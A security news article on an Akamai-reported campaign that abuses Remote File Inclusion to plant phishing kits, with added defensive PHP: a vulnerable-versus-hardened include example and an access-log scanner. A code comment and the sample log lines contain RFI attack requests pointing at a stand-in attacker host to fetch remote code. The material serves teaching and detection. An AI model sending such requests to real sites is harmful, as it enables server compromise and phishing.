Security researcher Larry Cashdollar of Akamai has identified a campaign that leverages Remote File Inclusion (RFI) vulnerabilities to deploy phishing kits. According to Cashdollar, in this attack the targeted server was observed serving a file crafted by the attackers.
RFI attacks are carried out by exploiting faulty file-inclusion functions within a website or application, which accept a user-supplied path or URL and load the file it points to. Such flaws can also lead to other attacks such as cross-site scripting (XSS), denial-of-service (DoS) or information disclosure.
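To make the "faulty inclusion function" concrete, the following is an added example (not code from the article, from Akamai, or from any site in the campaign) showing a minimal PHP page that picks a template from the request. The first version has the defect that allows RFI; the second uses an allow-list so no request string ever reaches include(). The parameter name page, the templates directory and the hostnames are assumptions for illustration.

```php
<?php
// Added example, not from the article: a request-selected template,
// first in the vulnerable form, then hardened. Names are assumptions.

// --- Vulnerable form ----------------------------------------------------
// When allow_url_include (and allow_url_fopen) are enabled, a request such as
//   ?page=http://attacker.example/kit.txt
// makes PHP fetch and execute the remote file. That is the mechanism by which
// a phishing kit lands on the server in the campaign described above.
function render_vulnerable(array $query): void
{
    $page = $query['page'] ?? 'home';
    include $page;                     // user-controlled value reaches include()
}

// --- Hardened form ------------------------------------------------------
// Map request values to a fixed set of local files; anything else is
// rejected before include() is ever called.
const TEMPLATES = [
    'home'    => __DIR__ . '/templates/home.php',
    'contact' => __DIR__ . '/templates/contact.php',
];

function resolve_template(string $page): ?string
{
    // Allow-list lookup: no request string is concatenated into the path,
    // so neither remote URLs nor ../ traversal can influence it.
    return TEMPLATES[$page] ?? null;
}

function render_hardened(array $query): void
{
    $page = (string)($query['page'] ?? 'home');
    $path = resolve_template($page);
    if ($path === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $path;
}

// Defence in depth: keep remote includes disabled server-wide in php.ini
// (allow_url_include=Off, which is the default), so that even a missed
// include() cannot fetch code over the network.
render_hardened($_GET);
```

The allow-list is the important part: validating that a value "looks local" is fragile, whereas a lookup table makes the set of includable files finite and reviewable. The php.ini setting is a backstop, not a substitute, since local file inclusion remains possible when paths are built from input.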
The big picture
Cashdollar mentions that the RFI attempts were modified according to the target.
“The RFI attempts recorded in my logs were tailored to the page being tested. If the website being targeted uses form_id= for example, then the requests will match that instead of the generic (and commonly used) page_id= or page=. This tells us the attacker is likely parsing the HTML, and examining the variables being sent via form to the backend,” said Cashdollar.
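Because the parameter name varies per target, a detection rule keyed on page= alone would miss the tailored requests Cashdollar describes. The following is an added example (not from the article or from Akamai) that scans access-log lines and flags any query parameter, whatever its name, whose value is a remote or stream-wrapper URL. The log lines are constructed, and the IP addresses and paths in them are placeholders.

```php
<?php
// Added example, not part of the article: flag access-log requests whose
// query string carries a URL in any parameter, the signature of an RFI
// attempt regardless of which parameter name the target site uses.
// The log lines below are constructed sample data.

const SAMPLE_LOG = <<<'LOG'
203.0.113.7 - - [10/Oct/2019:13:55:36 +0000] "GET /index.php?page=http://203.0.113.9/kit.txt HTTP/1.1" 200 512
203.0.113.7 - - [10/Oct/2019:13:55:37 +0000] "GET /submit.php?form_id=https://203.0.113.9/kit.txt HTTP/1.1" 200 512
198.51.100.4 - - [10/Oct/2019:13:56:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 4096
198.51.100.4 - - [10/Oct/2019:13:56:02 +0000] "GET /view.php?page_id=42 HTTP/1.1" 200 4096
LOG;

// Prefixes that, inside an include() argument, make PHP load content from
// somewhere other than a plain local path.
const REMOTE_SCHEMES = ['http://', 'https://', 'ftp://', 'php://', 'data:'];

function is_remote_reference(string $value): bool
{
    $v = strtolower(ltrim($value));
    foreach (REMOTE_SCHEMES as $scheme) {
        if (strncmp($v, $scheme, strlen($scheme)) === 0) {
            return true;
        }
    }
    return false;
}

/**
 * Return one finding per suspicious parameter, as
 * ['ip' => ..., 'path' => ..., 'param' => ..., 'value' => ...].
 */
function find_rfi_attempts(string $log): array
{
    $findings = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        // Common log format: client IP first, request line in double quotes.
        if (!preg_match('/^(\S+) .*?"(?:GET|POST) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
            continue;
        }
        [, $ip, $target] = $m;
        // Split on the first "?" only, so URLs inside the query stay intact.
        $parts = explode('?', $target, 2);
        if (count($parts) < 2) {
            continue;                   // no query string, nothing to inspect
        }
        [$path, $query] = $parts;
        parse_str($query, $params);     // decodes %XX and splits on "&"
        foreach ($params as $name => $value) {
            if (is_string($value) && is_remote_reference($value)) {
                $findings[] = [
                    'ip'    => $ip,
                    'path'  => $path,
                    'param' => (string)$name,
                    'value' => $value,
                ];
            }
        }
    }
    return $findings;
}

foreach (find_rfi_attempts(SAMPLE_LOG) as $f) {
    printf("RFI attempt from %s: %s?%s=%s\n", $f['ip'], $f['path'], $f['param'], $f['value']);
}
```

On the sample data the scanner reports the page= and form_id= requests and ignores the two benign ones. Inspecting every parameter value rather than a fixed name list is what makes the rule hold up against the per-target tailoring described in the quote; matching on the decoded value also catches percent-encoded schemes.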